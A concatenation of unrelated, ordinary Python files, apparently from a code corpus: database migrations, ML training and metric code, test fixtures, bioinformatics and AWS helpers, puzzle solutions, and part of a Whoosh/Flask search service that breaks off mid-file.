op.add_column("user", sa.Column("locked", sa.Boolean(), nullable=True))
op.drop_column("user", "blocked")
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column(
"user",
sa.Column(
"blocked",
mysql.TINYINT(display_width=1),
autoincrement=False,
nullable=True,
),
)
op.drop_column("user", "locked")
# ### end Alembic commands ###
|
python
|
#TODO check whether dummy classifier also does this
def count_true_positive(two_column_data_set):
positive_count = 0
for data in two_column_data_set["class"]:
##Hate Speech is labelled 0 in this project
if data == 0:
positive_count += 1
return positive_count
def compute_precision(positive_count, two_column_data_set):
    # positive_count is the number of false positives; when every record is labelled non-hate-speech, the rest of the data set counts as true positives
return (len(two_column_data_set["class"])-positive_count)/len(two_column_data_set["class"])
def compute_recall(positive_count, two_column_data_set):
    # always one: nothing is ever labelled hate speech, so there are no false negatives
return (len(two_column_data_set["class"])-positive_count)/(len(two_column_data_set["class"])-positive_count)
def compute_accuracy(positive_count, two_column_data_set):
return (len(two_column_data_set["class"])-positive_count) / len(two_column_data_set["class"])
def compute_f_one(precision, recall):
return 2*precision*recall/(precision+recall)
def print_metrics(positive_count, two_column_data_set):
print("Accuracy: ", compute_accuracy(positive_count, two_column_data_set),"\n",
"Precision: ", compute_precision(positive_count, two_column_data_set), "\n",
"Recall: ", compute_recall(positive_count, two_column_data_set),"\n",
"F1: ", compute_f_one(compute_precision(positive_count, two_column_data_set), compute_recall(positive_count, two_column_data_set)))
|
python
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from src.data_schema.feature_names import FeatureNames
from src.data_preparation.input_data_schema import LasVegasGovtDataSchema
def plot_feature_stat(df, feature_xaxis, feature_yaxis, output_file):
##### construct list of mean, standard deviation, max values,###
# min values, used for graph datapoints #####
groups_df = df.groupby([feature_xaxis])
# mean_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].mean()
mean_df = groups_df.mean()
mean_list = mean_df[feature_yaxis]
feature_list = df.groupby([feature_xaxis])[feature_xaxis]
# sd_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].std()
sd_df = groups_df.std()
# df.groupby([feature_xaxis]).std()
sd_list = sd_df[feature_yaxis]
# min_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].min()
min_df = groups_df.min()
min_list = min_df[feature_yaxis]
# max_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].max()
max_df = groups_df.max()
max_list = max_df[feature_yaxis]
#### plot the mean, standard deviation, max value, min value in graph #####
plt.errorbar(np.arange(len(feature_list)), mean_list.values, sd_list.values, fmt='ok', ecolor='blue', lw=3)
plt.errorbar(np.arange(len(feature_list)), mean_list.values,
[mean_list.values - min_list.values, max_list.values - mean_list.values],
fmt='.k', ecolor='gray', lw=1)
#### Round off the score to two decimal places to be displayed in the graph #####
for i in range(len(mean_list)):
mean_list[i] = round(mean_list[i],2)
for i in range(len(min_list)):
min_list[i] = round(min_list[i],2)
for i in range(len(max_list)):
max_list[i] = round(max_list[i],2)
    #### annotate the values of the datapoints in the graph ######
for xy in zip(np.arange(len(feature_list)), mean_list.values):
plt.annotate('(%s, %s)' % xy, xy=xy, textcoords='data')
for xy in zip(np.arange(len(feature_list)), min_list.values):
plt.annotate('(%s, %s)' % xy, xy=xy, textcoords='data')
for xy in zip(np.arange(len(feature_list)), max_list.values):
plt.annotate('(%s, %s)' % xy, xy=xy, textcoords='data')
#### display/save the label on x and y axis #####
plt.xlabel(feature_xaxis)
plt.ylabel(feature_yaxis)
# plt.show()
plt.savefig(output_file)
if __name__ == '__main__':
file = '../../resources/dataset/final_lasvegas_dataset.csv'
output_file = '../../resources/images/graphs/price.png'
df = pd.read_csv(file)
schema_obj = FeatureNames()
df = df[[schema_obj.COL_RESTAURANTS_PRICE_RANGE2, schema_obj.COL_INSPECTION_SCORE]]
plot_feature_stat(df, schema_obj.COL_RESTAURANTS_PRICE_RANGE2, schema_obj.COL_INSPECTION_SCORE, output_file)
|
python
|
from .sqlalchemy_conftest import * # noqa
@pytest.fixture(scope="session", autouse=True)
def set_up_gcs_mock_tempdir(tmp_path_factory):
from .okta_mock import _Auth
from alchemy.shared import auth_backends
auth_backends.auth, auth_backends.__auth = _Auth(), auth_backends.auth
auth_backends.init_app, auth_backends.__init_app = (lambda app, auth: None), auth_backends.init_app
class ReverseMock:
def __init__(self):
self.bypass_original = None
def __enter__(self):
self.bypass_original = auth_backends.auth.bypass
auth_backends.auth.bypass = False
def __exit__(self, exc_type, exc_val, exc_tb):
auth_backends.auth.bypass = self.bypass_original
auth_backends.ReverseMock = ReverseMock
@pytest.fixture(scope="session", autouse=True)
def disable_cloud_logging():
import os
old_val = os.environ.get('USE_CLOUD_LOGGING', default=None)
os.environ['USE_CLOUD_LOGGING'] = '0'
yield
if old_val is None:
del os.environ['USE_CLOUD_LOGGING']
else:
os.environ['USE_CLOUD_LOGGING'] = old_val
|
python
|
import argparse
from snakemake.shell import shell
from .slurm_job import SlurmJob
from exceRNApipeline.includes.utils import logger
def pre_process(input_fq, adapter, log_file, prefix):
cmd = f"""
hts_Stats -L {log_file} -U {input_fq} | \\
hts_AdapterTrimmer -A -L {log_file} -a {adapter} | \\
hts_QWindowTrim -n -A -L {log_file} | \\
hts_NTrimmer -n -A -L {log_file} | \\
hts_Stats -A -L {log_file} -f {prefix}
"""
logger(cmd)
shell(cmd)
def parse_args():
parser = argparse.ArgumentParser(
description="[exRNA-pipeline] pre-processing"
)
parser.add_argument("-i", "--input-fq", type=str,
help="Path to the input fastq files.")
parser.add_argument("-o", "--output-fq", type=str,
help="Path to t he output fastq files.")
parser.add_argument("-n", "--sample-name", type=str,
help="Sample name")
parser.add_argument("-a", "--adapter", type=str,
help="Adapter sequence.")
parser.add_argument("-l", "--log-file", type=str,
help="Path to the log file.")
parser.add_argument("-p", "--prefix", type=str,
help="Output prefix")
parser.add_argument("-s", "--scratch-dir", type=str,
help="Path to the scratch diractory.")
args = parser.parse_args()
if args.scratch_dir == "None":
args.scratch_dir = None
return args
def main():
args = parse_args()
if args.scratch_dir:
with SlurmJob(args.scratch_dir) as slurm:
pre_process(
args.input_fq, args.adapter,
f"{slurm.scratch}/{args.sample_name}.htsStats.log",
f"{slurm.scratch}/{args.sample_name}"
)
cmd = f"""
mv {slurm.scratch}/{args.sample_name}_SE.fastq.gz {args.output_fq}
mv {slurm.scratch}/{args.sample_name}.htsStats.log {args.log_file}
"""
logger(cmd)
shell(cmd)
else:
pre_process(args.input_fq, args.adapter,
                    args.log_file, args.prefix)
if __name__ == "__main__":
main()
|
python
|
import pandas as pd
import csv
original_csv = pd.read_csv('./Fuzzy_dataset.csv')
normal_csv = open('./fuzzy_normal_dataset.csv', 'w', newline='', encoding='utf-8')
normal_csv_file = csv.writer(normal_csv)
abnormal_csv = open('./fuzzy_abnormal_dataset.csv', 'w', newline='', encoding='utf-8')
abnormal_csv_file = csv.writer(abnormal_csv)
idx = 0
normal_first = False
abnormal_first = False
while idx < len(original_csv) // 30:
original_row = original_csv.iloc[idx]
number_of_data = original_row[2]
is_regular = (original_row[number_of_data + 3] == 'R')
original_row.dropna(inplace=True)
if is_regular:
if not normal_first and number_of_data != 8:
idx += 1
continue
normal_first = True
normal_csv_file.writerow(original_row[1:])
else:
if not abnormal_first and number_of_data != 8:
idx += 1
continue
abnormal_first = True
abnormal_csv_file.writerow(original_row[1:])
idx += 1
if idx % 500000 == 0:
print(idx)
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 18 15:34:32 2018
@author: wangyu
"""
import socket
import sys
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # same settings as the server side
try:
sock.connect(('127.0.0.1',1052))
except socket.error as e:
print(e)
sys.exit(-1)
data_send = 'test'
sock.send(data_send.encode())
data_recv = sock.recv(98)
print('received len is %d, the received content is %s' % (len(data_recv), data_recv.decode()))
sock.close()
|
python
|
from .settings import *
from .user_groups import *
|
python
|
import unittest
from unittest.mock import Mock, patch
from nuplan.common.actor_state.scene_object import SceneObject, SceneObjectMetadata
class TestSceneObject(unittest.TestCase):
"""Tests SceneObject class"""
@patch("nuplan.common.actor_state.tracked_objects_types.TrackedObjectType")
@patch("nuplan.common.actor_state.oriented_box.OrientedBox")
def test_initialization(self, mock_box: Mock, mock_tracked_object_type: Mock) -> None:
"""Tests that agents can be initialized correctly"""
scene_object = SceneObject(mock_tracked_object_type, mock_box, SceneObjectMetadata(1, "123", 1, "456"))
self.assertEqual("123", scene_object.token)
self.assertEqual("456", scene_object.track_token)
self.assertEqual(mock_box, scene_object.box)
self.assertEqual(mock_tracked_object_type, scene_object.tracked_object_type)
@patch("nuplan.common.actor_state.scene_object.StateSE2")
@patch("nuplan.common.actor_state.scene_object.OrientedBox")
@patch("nuplan.common.actor_state.scene_object.TrackedObjectType")
@patch("nuplan.common.actor_state.scene_object.SceneObject.__init__")
def test_construction(self, mock_init: Mock, mock_type: Mock, mock_box_object: Mock, mock_state: Mock) -> None:
"""Test that agents can be constructed correctly."""
mock_init.return_value = None
mock_box = Mock()
mock_box_object.return_value = mock_box
_ = SceneObject.from_raw_params("123", "123", 1, 1, mock_state, size=(3, 2, 1))
mock_box_object.assert_called_with(mock_state, width=3, length=2, height=1)
mock_init.assert_called_with(
metadata=SceneObjectMetadata(token="123", track_token="123", timestamp_us=1, track_id=1),
tracked_object_type=mock_type.GENERIC_OBJECT,
oriented_box=mock_box,
)
if __name__ == '__main__':
unittest.main()
|
python
|
# @Title: The repeated number in an array (数组中重复的数字 LCOF)
# @Author: 18015528893
# @Date: 2021-02-28 16:44:53
# @Runtime: 52 ms
# @Memory: 23.4 MB
from typing import List
class Solution:
def findRepeatNumber(self, nums: List[int]) -> int:
for i in range(len(nums)):
while nums[i] != i:
if nums[nums[i]] == nums[i]:
return nums[i]
else:
nums[nums[i]], nums[i] = nums[i], nums[nums[i]]
return -1
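# Illustrative example (not part of the submission): with nums = [2, 3, 1, 0, 2, 5, 3]
# the in-place cyclic swaps move each value v toward index v until a collision is hit,
# so Solution().findRepeatNumber([2, 3, 1, 0, 2, 5, 3]) returns 2 (the first duplicate found).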
|
python
|
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied.
# See the License for the specific language governing permissions and limitations under the License.
import logging
import boto3
from assertpy import assert_that
from utils import get_root_volume_id
def convert_tags_dicts_to_tags_list(tags_dicts):
"""Convert dicts of the form {key: value} to a list like [{"Key": key, "Value": value}]."""
tags_list = []
for tags_dict in tags_dicts:
tags_list.extend([{"Key": key, "Value": value} for key, value in tags_dict.items()])
return tags_list
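# Example (illustrative only):
#   convert_tags_dicts_to_tags_list([{"Key1": "Value1"}, {"Key2": "Value2"}])
#   -> [{"Key": "Key1", "Value": "Value1"}, {"Key": "Key2", "Value": "Value2"}]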
def get_cloudformation_tags(region, stack_name):
"""
Return the tags for the CFN stack with the given name
The returned values is a list like the following:
[
{'Key': 'Key2', 'Value': 'Value2'},
{'Key': 'Key1', 'Value': 'Value1'},
]
"""
cfn_client = boto3.client("cloudformation", region_name=region)
response = cfn_client.describe_stacks(StackName=stack_name)
return response["Stacks"][0]["Tags"]
def get_main_stack_tags(cluster):
"""Return the tags for the cluster's main CFN stack."""
return get_cloudformation_tags(cluster.region, cluster.cfn_name)
def get_ec2_instance_tags(instance_id, region):
"""Return a list of tags associated with the given EC2 instance."""
logging.info("Getting tags for instance %s", instance_id)
return (
boto3.client("ec2", region_name=region)
.describe_instances(InstanceIds=[instance_id])
.get("Reservations")[0]
.get("Instances")[0]
.get("Tags")
)
def get_tags_for_volume(volume_id, region):
"""Return the tags attached to the given EBS volume."""
logging.info("Getting tags for volume %s", volume_id)
return boto3.client("ec2", region_name=region).describe_volumes(VolumeIds=[volume_id]).get("Volumes")[0].get("Tags")
def get_head_node_root_volume_tags(cluster, os):
"""Return the given cluster's head node's root volume's tags."""
root_volume_id = get_root_volume_id(cluster.head_node_instance_id, cluster.region, os)
return get_tags_for_volume(root_volume_id, cluster.region)
def get_head_node_tags(cluster):
"""Return the given cluster's head node's tags."""
return get_ec2_instance_tags(cluster.head_node_instance_id, cluster.region)
def get_compute_node_root_volume_tags(cluster, os):
"""Return the given cluster's compute node's root volume's tags."""
compute_nodes = cluster.get_cluster_instance_ids(node_type="Compute")
assert_that(compute_nodes).is_length(1)
root_volume_id = get_root_volume_id(compute_nodes[0], cluster.region, os)
return get_tags_for_volume(root_volume_id, cluster.region)
def get_compute_node_tags(cluster):
"""Return the given cluster's compute node's tags."""
compute_nodes = cluster.get_cluster_instance_ids(node_type="Compute")
assert_that(compute_nodes).is_length(1)
return get_ec2_instance_tags(compute_nodes[0], cluster.region)
def get_ebs_volume_tags(volume_id, region):
"""Return the tags associated with the given EBS volume."""
return boto3.client("ec2", region_name=region).describe_volumes(VolumeIds=[volume_id]).get("Volumes")[0].get("Tags")
def get_shared_volume_tags(cluster):
"""Return the given cluster's EBS volume's tags."""
shared_volume = cluster.cfn_resources.get("EBS0")
return get_ebs_volume_tags(shared_volume, cluster.region)
|
python
|
"""
Helper module allowing src modules to be imported into tests
"""
# pylint: disable=wrong-import-position
# pylint: disable=unused-import
import os
import sys
from blockutils.common import ensure_data_directories_exist
from blockutils.stac import STACQuery
# NOTE: this must be before the modis and gibs imports - else tests will not find path
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "../src")))
from src.gibs import (
GibsAPI,
extract_query_dates,
make_list_layer_band,
move_dates_to_past,
)
from src.modis import Modis
|
python
|
from .context import get_puzzle, get_solution_script
index = 7
INPUT = """
16,1,2,0,4,2,7,1,2,14
"""[1:-1].split("\n")
def test_d7p1():
script = get_solution_script(index)
assert script is not None, "script is none"
d7p1 = script("d7p1")
assert d7p1 is not None, "d7p1 is none"
result = d7p1(INPUT)
assert result == 37, f"result is not 37: {result}"
def test_d7p2():
script = get_solution_script(index)
assert script is not None, "script is none"
d7p2 = script("d7p2")
assert d7p2 is not None, "d7p2 is none"
result = d7p2(INPUT)
assert result == 168, f"result is not 168: {result}"
|
python
|
from collections import deque
def getIsWall(data):
favoriteNumber = int(data)
def isWall(x, y):
if y < 0 or x < 0:
return True
n = favoriteNumber + x * x + 3 * x + 2 * x * y + y + y * y
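        # the point is a wall iff the binary representation of n has an odd number of 1 bits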
wall = 0
while n:
wall ^= n & 1
n >>= 1
return bool(wall)
return isWall
def search(isWall, goal):
seen = set()
queue = deque([((1, 1), 0)])
while queue:
curr, steps = queue.popleft()
if curr in seen:
continue
seen.add(curr)
if curr == goal:
return steps
y, x = curr
for nxt in ((y - 1, x), (y + 1, x), (y, x - 1), (y, x + 1)):
if not isWall(*nxt):
queue.append((nxt, steps + 1))
def searchMaxSteps(isWall, maxSteps):
seen = set()
queue = deque([((1, 1), 0)])
while queue:
curr, steps = queue.popleft()
if curr in seen or steps > maxSteps:
continue
seen.add(curr)
y, x = curr
for nxt in ((y - 1, x), (y + 1, x), (y, x - 1), (y, x + 1)):
if not isWall(*nxt):
queue.append((nxt, steps + 1))
return len(seen)
def part1(data):
return search(getIsWall(data), (31, 39))
def part2(data):
return searchMaxSteps(getIsWall(data), 50)
if __name__ == "__main__":
from aocd import get_data
data = get_data(year=2016, day=13)
print(part1(data))
print(part2(data))
|
python
|
# coding: utf-8
import cv2, os, sys
from PIL import Image
import numpy as np
from tensorflow import keras
from tensorflow.keras.layers import Input
from .Models import GoogLeNetModel
from .Models import VGG16Model
from .Models import InceptionV3Model
from .Models import MobileNetModel
from .Models import ResNet50Model
from . import const
from . import DA
from . import DA_setting
from main.log import get_logger
logger = get_logger(__name__)
class BaseNetwork(object):
def __init__(self, **params):
self.channel = params['channel'] if 'channel' in params else 3
self.classes = params['classes'] if 'classes' in params else 1
self.network = params['network']
self.input_size = params['input_size'] if 'input_size' in params else None
self.mean_image = params['mean_image'] if 'mean_image' in params else None
self.image_type = params['image_type'] if 'image_type' in params else None
self.xn = None
self.yn = None
self.val_xn = None
self.val_yn = None
self.pred_xn = None
self.pred_yn = None
def generate_train_data(self, train_list, da, batch_size):
# count = 0
while True:
for data in train_list:
# count += 1
# get image(np.ndarray)
image = self._get_image_array(data[0],
resize=self.input_size,
dtype=np.uint8,
normalization=False)
# for galleria
y = data[1]
# Data augmentation
if len(data) < 3:
da_info = [[DA.NON_DA], [DA.NON_DA]]
else:
da_info = data[2]
da_im = da.get_image(image, da_info[0], da_info[1])
# test code
#savedir = ""
#savename = "test_{}.jpg".format(count)
#savepath = os.path.join(savedir,savename)
#save_arr = Image.fromarray(np.uint8(da_im))
#save_arr.save(savepath)
da_im = da_im[np.newaxis,:,:,:]
da_im = da_im.astype(np.float32)
da_im /= 255
if self.xn is None:
self.xn = da_im
self.yn = y
else:
self.xn = np.vstack((self.xn, da_im))
self.yn = np.vstack((self.yn, y))
if len(self.xn) == batch_size:
input_xn = self.xn
input_yn = self.yn
self.xn = None
self.yn = None
if self.network == const.GOOGLE_NET:
yield(input_xn,
{'loss1': input_yn,
'loss2': input_yn,
'loss3': input_yn})
else:
yield(input_xn, input_yn)
def generate_val_data(self, val_list, da, batch_size):
# count = 0
while True:
for data in val_list:
# count += 1
# get image(np.ndarray)
image = self._get_image_array(data[0],
resize=self.input_size,
dtype=np.uint8,
normalization=False)
# for galleria
y = data[1]
# Data augmentation
if len(data) < 3:
da_info = [[DA.NON_DA], [DA.NON_DA]]
else:
da_info = data[2]
da_im = da.get_image(image, da_info[0], da_info[1])
# test code
#savedir = ""
#savename = "val_{}.jpg".format(count)
#savepath = os.path.join(savedir,savename)
#save_arr = Image.fromarray(np.uint8(da_im))
#save_arr.save(savepath)
da_im = da_im[np.newaxis,:,:,:]
da_im = da_im.astype(np.float32)
da_im /= 255
if self.val_xn is None:
self.val_xn = da_im
self.val_yn = y
else:
self.val_xn = np.vstack((self.val_xn, da_im))
self.val_yn = np.vstack((self.val_yn, y))
if len(self.val_xn) == batch_size:
input_xn = self.val_xn
input_yn = self.val_yn
self.val_xn = None
self.val_yn = None
if self.network == const.GOOGLE_NET:
yield(input_xn,
{'loss1': input_yn,
'loss2': input_yn,
'loss3': input_yn})
else:
yield(input_xn, input_yn)
def generate_predict_data(self, test_list, batch_size):
while True:
for data in test_list:
image = self._get_image_array(data[0], #train_path,
resize=self.input_size,
dtype=np.uint8,
normalization=False)
image = image[np.newaxis,:,:,:]
image = image.astype(np.float32)
image /= 255
if self.pred_xn is None:
self.pred_xn = image
else:
self.pred_xn = np.vstack((self.pred_xn, image))
if len(self.pred_xn) == batch_size:
input_xn = self.pred_xn
self.pred_xn = None
yield(input_xn)
def _get_image_array(self, path, **params):
dtype = params['dtype'] if 'dtype' in params else np.float32
resize = params['resize'] if 'resize' in params else None
normalization = params['normalization'] if 'normalization' in params else False
if self.channel == 1:
#img = Image.open(path).convert('L')
img = Image.open(path).convert('RGB')
elif self.channel == 3:
img = Image.open(path).convert('RGB')
else:
img = Image.open(path).convert('RGB')
im_arr = np.asarray(img)
if resize is not None:
im_arr = cv2.resize(im_arr, tuple(resize), interpolation=cv2.INTER_CUBIC)
# 8bit image convert [w,h,1]
# 32 bit image keep [w,h,3]
if im_arr.ndim == 2:
im_arr = im_arr[:,:,np.newaxis]
        # guard against RGBA input: keep only the first three (RGB) channels
        if im_arr.ndim == 3 and im_arr.shape[2] == 4:
            im_arr = im_arr[:, :, :3]
im_arr = im_arr.astype(dtype)
# use mean image
if self.mean_image is not None:
mean = Image.open(self.mean_image).convert('RGB')
mean_arr = np.asarray(mean)
im_arr -= mean_arr
if normalization == True:
im_arr /= 255
return im_arr
'''
def _resize_array(self, image):
if image.shape[0] != self.input_size[0] or image.shape[1] != self.input_size[1]:
if image.dtype == np.float32 or image.dtype == np.float64:
if K.image_dim_ordering() == 'th':
image = image[0,:,:]
else:
image = image[:,:,0]
im = Image.fromarray(image)
im = im.resize(self.input_size, resample=Image.BICUBIC)
image = np.asarray(im)
if K.image_dim_ordering() == 'th':
image = image[np.newaxis,:,:]
else:
image = image[:,:,np.newaxis]
return image
'''
class Network(BaseNetwork):
def __init__(self, **params):
super(Network,self).__init__(**params)
input_tensor = Input(shape=(self.input_size[0], self.input_size[1], self.channel))
# input_tensor = Input(shape=(self.input_size[0], self.input_size[1], 3))
self.model = None
logger.debug(self.network)
if self.network == const.GOOGLE_NET:
# self.model = InceptionV3Model(self.classes,input_tensor).model
# self.model = GoogLeNetModel(self.classes, None, self.channel, self.input_size).model
self.model = GoogLeNetModel(self.classes, None, 3, self.input_size).model
elif self.network == const.VGG16:
self.model = VGG16Model(self.classes,input_tensor).model
elif self.network == const.MOBILE_NET:
self.model = MobileNetModel(self.classes,input_tensor).model
elif self.network == const.RESNET50:
self.model = ResNet50Model(self.classes,input_tensor).model
# self.model.summary()
def train(self, train_data, val_data, **params):
epochs = params['epochs'] if 'epochs' in params else 1
callbacks = params['callbacks'] if 'callbacks' in params else None
batch = params['batch'] if 'batch' in params else 1
val_batch = params['val_batch'] if 'val_batch' in params else 1
da_params = params['data_augmentation'] if 'data_augmentation' in params else None
da= DA_setting.run(da_params)
da_instance = DA.DataAugmentation(da)
train_data = da_instance.create_data_list(train_data)
val_data = da_instance.create_data_list(val_data)
train_data_batch_num = len(train_data) // batch
if train_data_batch_num < 1:
logger.debug('train_data_batch_num < 1')
sys.exit(1)
if val_data is not None:
val_data_batch_num = len(val_data) // val_batch
logger.debug(val_data_batch_num)
if val_data_batch_num < 1:
logger.debug('val_data_batch_num < 1')
sys.exit(1)
self.model.fit(
self.generate_train_data(train_data, da_instance, batch),
steps_per_epoch=train_data_batch_num,
epochs=epochs,
validation_data=self.generate_val_data(val_data, da_instance, val_batch),
validation_steps=val_data_batch_num,
callbacks=callbacks,
verbose=1)
else:
self.model.fit(
self.generate_train_data(train_data, da_instance, batch),
steps_per_epoch=train_data_batch_num,
epochs=epochs,
callbacks=callbacks,
verbose=1)
def save(self, path):
self.model.save(path)
def predict(self, data_list, **params):
batch = params['batch'] if 'batch' in params else 1
return self.model.predict_generator(
self.generate_predict_data(data_list, batch),#, da_instance),
steps=len(data_list) // batch,
verbose=1)
|
python
|
#!/usr/bin/env python
from argparse import ArgumentParser
import sys
parser = ArgumentParser(description="Run the test suite.")
parser.add_argument(
"--failfast",
action="store_true",
default=False,
dest="failfast",
help="Stop the test suite after the first failed test.",
)
parser.add_argument(
"--no-coverage",
action="store_false",
default=True,
dest="coverage",
help="Do not run coverage.py while running the tests.",
)
parser.add_argument(
"--no-input",
action="store_false",
default=True,
dest="interactive",
help="If the tests require input, do not prompt the user for input.",
)
args = parser.parse_args()
if args.coverage:
try:
from coverage import coverage
cov = coverage(include="doac*")
cov.start()
except ImportError:
cov = None
else:
cov = None
from django.conf import settings
from tests import settings as test_settings
settings.configure(test_settings, DEBUG=True)
from django.test.utils import get_runner
TestRunner = get_runner(settings)
runner = TestRunner(verbosity=1, interactive=args.interactive, failfast=args.failfast)
failures = runner.run_tests(["tests", ])
if cov:
cov.stop()
cov.html_report()
if failures:
sys.exit(bool(failures))
|
python
|
import torch
def accuracy(pred, target):
    """Fraction of predictions whose argmax matches the class index in `target`."""
    pred = pred.float()
    # argmax returns a single index per row even when several logits tie for the
    # maximum, which the original (pred[i] == pred[i].max()).nonzero() check did not handle
    correct = (pred.argmax(dim=1) == target.reshape(-1)).sum().item()
    return correct / target.size(0)
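# Minimal usage sketch (random tensors, illustrative only):
#   logits = torch.randn(8, 5)           # batch of 8 samples, 5 classes
#   labels = torch.randint(0, 5, (8,))   # ground-truth class indices
#   print(accuracy(logits, labels))      # fraction in [0, 1]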
|
python
|
# Function to sort an unsorted list (due to globbing) using a number
# occurring in the path.
# Author: Lukas Snoek [lukassnoek.github.io]
# Contact: [email protected]
# License: 3 clause BSD
from __future__ import division, print_function, absolute_import
import os.path as op
def sort_numbered_list(stat_list):
""" Sorts a list containing numbers.
Sorts list with paths to statistic files (e.g. COPEs, VARCOPES),
which are often sorted wrong (due to single and double digits).
This function extracts the numbers from the stat files and sorts
the original list accordingly.
Parameters
----------
stat_list : list or str
list with absolute paths to files
Returns
-------
sorted_list : list of str
sorted stat_list
"""
num_list = []
for path in stat_list:
num = [str(s) for s in str(op.basename(path)) if s.isdigit()]
num_list.append(int(''.join(num)))
sorted_list = [x for y, x in sorted(zip(num_list, stat_list))]
return sorted_list
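if __name__ == '__main__':
    # Minimal sketch with hypothetical file names: single- and double-digit
    # numbers come back in numeric rather than lexicographic order.
    example = ['cope10.nii.gz', 'cope2.nii.gz', 'cope1.nii.gz']
    print(sort_numbered_list(example))
    # -> ['cope1.nii.gz', 'cope2.nii.gz', 'cope10.nii.gz']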
|
python
|
##############################
# query service backend for the front-end web system
# filename:query.py
# author: liwei
# StuID: 1711350
# date: 2019.12.1
##############################
# Query construction
from whoosh import highlight
from whoosh import qparser
from whoosh import index
from flask import Flask
from flask import request
from flask import jsonify,render_template,abort, redirect, url_for,session, escape,Markup
from flask_cors import *
import re
import logging
from numpy import std
from data import xy_dict
from data import get_html,get_teacher_info,pagerank
# from audio import *
app = Flask(__name__)
CORS(app, supports_credentials=True)  # allow cross-origin requests from the front end
app.secret_key=b'\xfa\n\x08\xb9\x84I\xe5xRdE\xea\x9f\xba\xce\x81'
mysession = dict()  # custom session dict used to pass data between requests
url_dict, scores = pagerank(get_teacher_info())  # run PageRank over the crawled pages: returns the URL index map and the ranking scores
# logging configuration
LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
DATE_FORMAT = "%m/%d/%Y %H:%M:%S %p"
logging.basicConfig(filename='my.log', level=logging.DEBUG, format=LOG_FORMAT, datefmt=DATE_FORMAT)
ix = index.open_dir("index")  # open the directory that stores the index files
# page snapshot route
@app.route('/snapshots/<xueyuan>/<filename>',methods=["GET"])
def snapshots(xueyuan = None ,filename=None):
if filename!=None and xueyuan !=None:
return render_template('snapshots/'+xueyuan+'/'+filename)
# home page route
@app.route('/',methods=["GET"])
def index():
return render_template("index.html",query="")
# results page route
@app.route('/display/',methods=["GET","POST"])
def display_index():
return render_template("display.html",count="#",query="输入查询词")
# GET handler for the results page
@app.route('/display/<count>&<query>')
def display(count=None,query=None):
#print(query)
if 'data' in mysession.keys():
#print(mysession["data"])
return render_template("display.html",count=count,query=query,res=mysession['data'])
else:
return redirect('/display/')
# # 实现语音输入查询
# @app.route('/audio',methods=['GET','POST'])
# def audio_query():
# assert request.path == '/audio'
# # 通过语音识别API获取查询输入
# get_audio(in_path)
# # 测试代码
# filename = "./speechs/input.wav"
# signal = open(filename, "rb").read()
# rate = 16000
# token = get_token()
# msg = recognize(signal, rate, token)
# query_sentence = " "
# if "err_no" in dict(msg).keys():
# logging.warning("%d,没有获取有效语音输入!错误消息%s 错误代码%d" %( 404,msg["err_msg"],msg["err_no"]))
# return "%d,没有获取有效语音输入!错误消息%s 错误代码%d" %( 404,msg["err_msg"],msg["err_no"]), 404
# else:
# query_sentence = msg['result']
# # 记录日志
# logging.info("Audio Query sentence: %s" % query_sentence)
# res = []
# with ix.searcher() as searcher:
# # 对输入的查询文本进行解析,如果存在按域查询的需求则区分按域查询,默认采用多属性查询模式
# # mark 表示是否需要高亮学院查询区域,默认情况下需要
# highlight_xy = True
# # 默认的多域查询
# query = qparser.MultifieldParser(["content", "title", "mtext", "xueyuan"], ix.schema)
# if query_sentence.endswith("$姓名$"):
# # 按名字查询
# query = qparser.SimpleParser("title", ix.schema)
# query_sentence = query_sentence.strip('$姓名$')
# elif query_sentence.endswith("$学院$"):
# # 按学院查询
# query = qparser.SimpleParser("xueyuan", ix.schema)
# query_sentence = query_sentence.strip('$学院$')
#
# elif query_sentence.endswith("$网页$"):
# # 按网页内容查询
# query = qparser.SimpleParser("content", ix.schema)
# query_sentence = query_sentence.strip('$网页$')
#
# # print(query_sentence)
# # 引入查询解析器插件
# query.add_plugin(qparser.WildcardPlugin)
#
# # query.remove_plugin_class(qparser.WildcardPlugin)
# query.add_plugin(qparser.PrefixPlugin())
# query.add_plugin(qparser.OperatorsPlugin)
# query.add_plugin(qparser.RegexPlugin)
# query.add_plugin(qparser.PhrasePlugin)
#
# # 解析得到查询器
# q = query.parse(query_sentence)
# logging.info("Query parse result: %s" % str(q))
# print(q)
# # 获取查询结果
# result = searcher.search(q, limit=20)
# # print(result)
# # 设置碎片的属性
# # Allow larger fragments
# my_cf = highlight.ContextFragmenter(maxchars=200, surround=30)
# hf = highlight.HtmlFormatter(tagname='em', classname='match', termclass='term')
#
# hi = highlight.Highlighter(fragmenter=my_cf, formatter=hf)
# for hit in result:
# print(hit["picpath"])
# print(hit["title"])
# print(escape(hi.highlight_hit(hit, "content")))
# if hit['picpath'] == '#':
# if highlight_xy:
# res.append({"title": hit['title'],
# "xueyuan": Markup(hi.highlight_hit(hit, "xueyuan")),
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": '#',
# "pagerank": scores[url_dict[hit["url"]]]
# })
# else:
# res.append({"title": hit['title'],
# "xueyuan": hit["xueyuan"],
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": '#',
# "pagerank": scores[url_dict[hit["url"]]]
# })
# else:
# if highlight_xy:
# res.append({"title": hit['title'],
# "xueyuan": Markup(hi.highlight_hit(hit, "xueyuan")),
# "url": hit["url"],
